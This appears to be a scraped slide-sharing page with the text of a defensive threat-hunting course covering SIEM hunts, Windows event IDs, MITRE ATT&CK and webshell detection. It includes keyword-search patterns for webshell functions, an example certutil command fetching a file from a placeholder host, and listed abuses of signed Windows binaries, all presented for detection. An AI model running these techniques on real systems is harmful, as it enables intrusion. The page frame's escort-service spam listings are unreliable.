Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Ethical Hacking Overview
Ethical Hacking OverviewEthical Hacking Overview
Ethical Hacking Overview
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion Techniques
 

Recently uploaded

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 

Threat hunting in cyber world

  • 2. AKASH SARODE @AKKY2892  Threat Hunter  Security researcher  Twitter - @Akky2892  Blog – https://akkysanj.wordpress.com  Github - https://github.com/akky2892  Creator of NoMoreMalware and HuntIT.  Author of multiple whitepapers – Machine learning- Learning cybersecurity, Threat hunting – Hunter or Hunted, Analysis Using Analytics In Cybersecurity.  Previous Training – Machine learning : The Future.
  • 3. COURSE DESCRIPTION  Introduction to Threat Hunting  Threat Hunting Terminology  Threat Intelligence and IOC  Hunting methodology  Threat hunting - Network, Endpoint level  Operationalizing & Automating Threat hunting  Use case of Real-time Threat Hunting  Research & Resources  Further study and Road Ahead
  • 4. COURSE INDEX 1. Introduction to Threat Hunting • Threat hunting in Cyberworld • Why to perform threat hunting 2. Terminologies in hunting 3. Introducing Threat Intelligence • Threat Intelligence and Threat Hunting = Intelligent hunting • Indicators of Compromise IOC 4. Threat Hunting methodology • Threat hunting process & Threat Hunting loop • Threat Hunting techniques • Pyramid of pain • Hunting Maturity model
  • 5. COURSE INDEX 5. Network hunting and Endpoint hunting • Hunting Webshells • Hunting malware • Network traffic hunting 6. Using MITRE ATT&CK framework • Sigma rules for threat hunting 7. Threat Hunting using SIEM 8. Examples of Threat hunting hunts 9. Real World Hunting Process 10. Machine Learning & Threat Hunting – Advanced hunting 11. Threat Hunting Resources 12. Conclusion • Red Teamer cyber kill chain vs Blue teamer defense chain
  • 6. INTRODUCTION TO THREAT HUNTING  The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.  My definition – Finding stuff.  Threat Hunting is not a Technology but Approach.  Data- driven approach rather than traditional alert-driven approach.  Applying our knowledge in an effective way to look out for any anomalies in the environment.  Two ways to perform hunting –  Manual  Automated/Machine-assisted
  • 7.
  • 8. THREAT HUNTING IN CYBERWORLD  In Cyberworld, attackers are getting intelligent day-by-day.  Modern-day attacks cannot be prevented/detected by alerts generated from SIEM.  Need of hour – Next generation detection system.  Hunting – not tool dependent, its people dependent.  Machine Learning can help to certain extent but manual intervention in triage is always required.  Instead of reacting to attacks, lets start proactively looking for threats before attack happens.
  • 9. WHY TO PERFORM THREAT HUNTING  Alert driven approach is not sufficient.  Hypothesis driven approach will be the future.  Dependency on tools should be eradicated.  Hunting can be performed on any tool.  Benefit - Continuous improvement in detection capabilites, find unknown malicious activity
  • 10. TERMINOLOGIES IN THREAT HUNTING  SIEM – Security Information & Event management  IOC- Indicators of Compromise  TTP – Tools, Techniques & procedures  IR- Incident response  EDR – Endpoint detection and response  UEBA – User entity and behavior analytics  BIOC – Behavior indicators of compromise
  • 11. THREAT INTELLIGENCE  Threat Intelligence are feeds which are received in the form of urls, files, domains, etc.  Can be used to perform intelligent hunting.  IOC’s of attack/threat are generated by various research companies.  Sources –  articles,  security news,  new APT public report,  Twitter
  • 12. THREAT INTELLIGENCE  BIOC – Behavioral Indicators.  Threat Hunting is effective by proper intels.  Threat Intel team proposes new intel, CIRT team builds hypothesis and create detection based on intel, Threat hunting team hunts with or without intel.  Various vendors are in market- Cisco Talos, Palo alto Unit 42, Cylance, AlienVault OTX, MISP, Yara rules. Threat Intelligence + Threat Hunting = Intelligent Hunting
  • 13. THREAT HUNTING METHODOLOGY  Different methods to perform threat hunting.  We will be explaining the following –  Threat Hunting process  Threat Hunting loop  Pyramid of pain  Hunting Maturity model  ATT&CK for hunts  Hunt or be Hunted
  • 14. THREAT HUNTING PROCESS  Ways of hunting –  Manual – Analyst need to continuously looking for anything that could be evidence/indicator of intrusion.  Important for the threat hunter to keep current on the latest security research.  Automated/Machine-assisted – Analyst uses software that leverages “Machine Learning” and “UEBA” to inform analyst about potential risks.  • It helps in providing Predictive and Prescriptive analytics.
  • 15. THREAT HUNTING PROCESS  Hypothesis driven approach  What is Hypotheses ?  Assumption on attack behavior.  Actionable use case based on observations, intelligence, and experience  Three types of hypotheses:  Analytics-Driven: "Machine-learning and UEBA, used to develop aggregated risk scores that can also serve as hunting hypotheses"[5]  Situational-Awareness Driven: "Crown Jewel analysis, enterprise risk assessments, company- or employee-level trends"[5]  Intelligence-Driven: "Threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"[  Hypothesis can be developed using any public APT report, twitter, security news, articles etc.
  • 18. THREAT HUNTING TECHNIQUES  Searching - use of specialized queries that return results and artifacts.  Clustering - machine learning model that uses advanced AI search techniques to make correlations within advanced and vast arrays of data.  Grouping – grouping artifacts together to identify any anomalies  Stack counting - stacking is how many times each unique value of column has occurred, like least commonly accessed file, rarity is suspicious.
  • 20. THREAT HUNTING MATURITY MODEL Source : sqrrl TMM
  • 21. MITRE ATT&CK FRAMEWORK  MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.  It consists of TTP’s – Tactics, Techniques and procedures.  MITRE has also came up with a project name “CAR” Cyber Analytics Repository.  The Mitre team has listed down all those adversary behaviors and attack vectors carries out by an adversary on a victim machine.  It uses TTP’s Tactics, Techniques and Procedures and maps it to Cyber Kill chain.
  • 23. SIGMA RULES FOR THREAT HUNTING  Sigma is Generic Signature Format for SIEM Systems written by Florian Roth @Neo23x0 and Thomas Patzke.  Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner.  Sigma is for log files what Snort is for network traffic and YARA is for files.  Sigma rules contains mapping of all ATT&CK techniques.  Using sigma for threat hunting in siem, refer Sigma-to project:-  https://github.com/akky2892/Sigma-to
  • 24. HUNTING WEBSHELLS  A web shell is a script written in the supported language of a target web server to be uploaded to enable remote access of the machine.  Mostly written in php or Asp  Multiple attack techniques can be used to upload webshell on webserver – XSS, SQL injection, RFI, LFI & many more…  Popular webshells – C99, R57, etc.  Let’s Hunt it!
  • 25. HUNTING WEBSHELLS - KEYWORDS  First way for hunting webshells – Look out for reference to suspicious keywords within files on webserver - eval() or cmd.exe  For linux –  Under var/www/html directory, we can search for any php files with suspicious commands  find . –type ‘*.php’ | xargs egrep –l “(fsockopen|mail|exec|eval|system|base64_decode)”  For Windows –  Use Powershell to search in similar way  Get-childitem –recurse –include “*.php” | select-string “(fsockopen|mail|exec|eval|system|base64_decode)” | %{“$($._filename)”}
  • 26. HUNTING WEBSHELLS - TOOLS  Multiple tools can be used to hunt for webshells in your environment. These tools are integrated with IOC’s , YARA rules to identify maliciousness.  LOKI IOC Scanner  PHP-Malware Finder  unPHP  Linux Malware detect  Invoke-ExchangeWebShellHunter  etc…  In addition to these techniques, we can also use baselines deviation and file stacking technique to hunt for webshell.
  • 27. ENDPOINT HUNTING  Endpoint is where the malware behavior is more prevalent.  Most of the post-exploitation techniques can be hunted using Endpoint logs.  File activity, Registry activity, Process activity can be used to hunt out for any malicious behavior.  Multiple attack techniques such as DLL injection, hook injection, fuzzy hashing can be hunted down using endpoint logs.  ATT&CK MITRE is the best way to utilize the efforts and use these to hunt out for threats.
  • 28. DLL HIJACKING  Post exploitation technique  Monitoring of Windows API calls, monitoring of windows registry path for any changes.  VirtualAllocEx reserves or changes a region of memory  WriteProcessMemory writes data to an area of memory in a specified process  CreateRemoteThread creates a thread in the address space of another process
  • 29. APPININT DLLS  Powershell contains powersploit which can be used for code injection.  Monitoring malicous DLL loads - AppInit DLLs//// DLLs that are specified in the AppInit_DLLs value in the Registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows are loaded by user32.dll into every process that loads user32.dll.
  • 30. NETWORK HUNTING  Network Traffic hunting requires network traffic logs.  Multiple tools can be used to analyze suspicious network traffic.  In addition to packet capturing, malicious traffic analysis features in Next Generation Firewall, UTM, IDS/IPS, we also need to hunt for traffic which has bypassed these devices.  Wireshark can be used.  Let’s look at simple example :-
  • 31. NETWORK HUNTING – HTTPS TRAFFIC Normal HTTPS Suspicious HTTPS Port 443 or 8443 Malware use this port as well. Traffic is encrypted If traffic is not encrypted & secure socket layer packet details are empty, something suspicious Web server in FQDN format Server will point to IP address instead of FQDN HTTPS is Secure version -Secure socket Layer (SSL/TLS)
  • 32. NETWORK HUNTING – HTTPS TRAFFIC
  • 33. THREAT HUNTING USING SIEM  Threat Hunting is basically searching something.  We need to have proper & useful data to hunt for threats in enterprise.  SIEM – Security Information & Event Management is such tool which can prove to be useful in threat hunting.  SIEM collects logs from multiple devices of your network enterprise.  In addition to threat intelligence feeds, SIEM is very useful in querying the log database to identify any anomaly.  Let’s look at some of use cases:-
  • 34. THREAT HUNTING USING SIEM Source : elastic.co
  • 35. THREAT HUNTING USING SIEM Famous Email word/excel Macro attachments:- • Phishing email containing .doc with macro file • Macro contains script to initiate powershell.exe • Powershell.exe uses legitimate tools like mimikatz for credential dump for gaining hashes from memory. • What commands are executed using mimikatz.
  • 36. THREAT HUNTING USING SIEM  Event viewer logs in SIEM can be useful to hunt for multiple threats.  Sysmon can be used to collect logs specific to endpoint systems based on defined configuration.  Search queries are useful in identifying any malicious behavior inside the enteprise environment.  In addition to threat intelligence and search queries, analytics is being used in SIEM which uses Machine learning to automatically identify any anomalies inside the environment.  We will look out for some examples of hunts to be clear -
  • 37. THREAT HUNTING HUNTS Threat activity Hunts to look out for Hunting suspicious accounts See for any unusual accounts logged into machines with admin right – Event ID – 4672 (Special privileges assigned to new logon) Hunting Scheduled tasks Event ID – 4698, 106, 200 & 201 Hunting Pass the hash (PTH) Event ID- 4624 with logon type 3 Logon process – NtLmSsp, Key length – 0 Hunting for service creation Event ID- 4697 Hunting network shares Event ID - 4776 Hunting for process masquerading Look out for process path form where process is executing – Example explorer.exe should run from C:Windowsexplorer.exe or C:Windowssystem32explorer.exe
  • 38. THREAT HUNTING HUNTS  PTH – Look for remote logins associated with execution/writing of binaries.  IFEOI – Changes to path - HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsxyz.exeDebugger  Rundll32.exe making connection to internet.  Deletion of shadow copy file using wmic, vssadmin | *delete
  • 39. THREAT HUNTING HUNTS  Disable system restore - Registry Write and Key = HKLMSoftwareMicrosoftWindows NtSystemRestoreDisableSR and value = 1  Connection to process other than browser to suspicious domains like .tk, .onion,.tor2web etc.  Certutil.exe used to download files from internet - certutil.exe -urlcache -split -f http://example/file.txt
  • 40. THREAT HUNTING HUNTS  Monitor scheduled tasks – at and schtasks windows task scheduler used to schedule scripts to be executed.  Double extensions malwares  Control.exe used to execute file stored in ADS.  Gpscript.exe used to executes logon scripts.  Mavinject.exe used to execute, read ADS files.  Hh.exe – executing and downloading files  Scriptrunner.exe – execution  Regsvr32.exe – Download script from internet All are windows signed binaries, so none of Endpoint protection will tag it.
  • 41. THREAT HUNTING HUNTS  Similar to the discussed hunts, there are multiple techniques which can be used to hunt for threats.  A collection of many such techniques is collaborated and presented by ATT&CK MITRE & Sigma rules.  Hunting using SIEM is the way ahead but there are multiple SIEM vendors – RSA, Elasticsearch, Arcsight, Qradar etc.  In order to make life easy, I have prepared a Master Sheet of threat hunting hunts mapping it to respective SIEM vendors-  Query it & Hunt IT - https://github.com/akky2892/Sigma-to/blob/master/Sigma-to.xlsx
  • 42. REAL WORLD HUNTING PROCESS What is threat hunting:- The human-centric process of proactively searching for evidence of attacks. Anyone can threat hunt; experienced threat hunters have better models. Threat hunting is the application of one or more models or frameworks to a problem. The easiest framework to start with is Attack Centric Hunting. In Attack centric hunting (ACH), you focus on seeking evidence that identifies a specific attack. It's a 4 step process that starts with a question.  1. Question - Has an Attack incident occurred on my network?  2. What am I looking for?  3. Where am I likely to find it?  4. How can I manipulate the data to find it?
  • 43. REAL WORLD HUNTING PROCESS Example: Question: Has Credential theft happened on my network?  1. What am I looking for? a) Evidence of credential dumping application execution. b) never before seen processes, process anomalies.  2. Where am I likely to find it ? a) Windows process execution logs.  3. How can I manipulate the data to see it ? a) Aggregate EID 4688 by process name for all endpoints and sort by least frequent occurrence (LFO). (Event ID4688 = Process Execution event ID. )
  • 44. MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING  Multiple SIEM vendors, or security product solutions uses Machine Learning or AI to assist threat hunting.  Machine learning uses Classification, Association algorithms to identify & detect any kind of anomalies in network.  Network traffic spike, unusual user account, computer account behavior, any deviation from baselines can be identified by such techniques.  Analytics is widely used in modern day world and it has find it place in Cyber security as well.  Microsoft Defender, Microsoft ATA, Qradar SIEM, Fireeye, etc.
  • 45.
  • 46. MACHINE LEARNING & THREAT HUNTING - ADVANCED HUNTING
  • 48. THREAT HUNTING RESOURCES  Threathunting.net  MITRE ATT&CK - attack.mitre.org  https://github.com/ThreatHuntingProject/ThreatHunting - David J Bianco  https://github.com/VVard0g/ThreatHunter-Playbook - Roberto Rodriguez (@Cyb3rWard0g)  https://blog.menasec.net  https://github.com/akky2892/Cyber-Threat-Hunting  Whitepapers, blogs, articles on threat hunting.  Research work on twitter - Oddvar Moe, Florian roth, Roberto rodriques, Olaf hangton, David J Bianco, sqrrl, Samir @ Sbousseaden & many more.  Sans – Threat Hunting Summit, defcon, Att&ckon, Derbycon, Nullcon Webinars/Webcasts …
  • 49. CONCLUSION Red Teamer Cyber Kill Chain Blue Teamer Defense Chain Identify Preven t Detect Respond Recover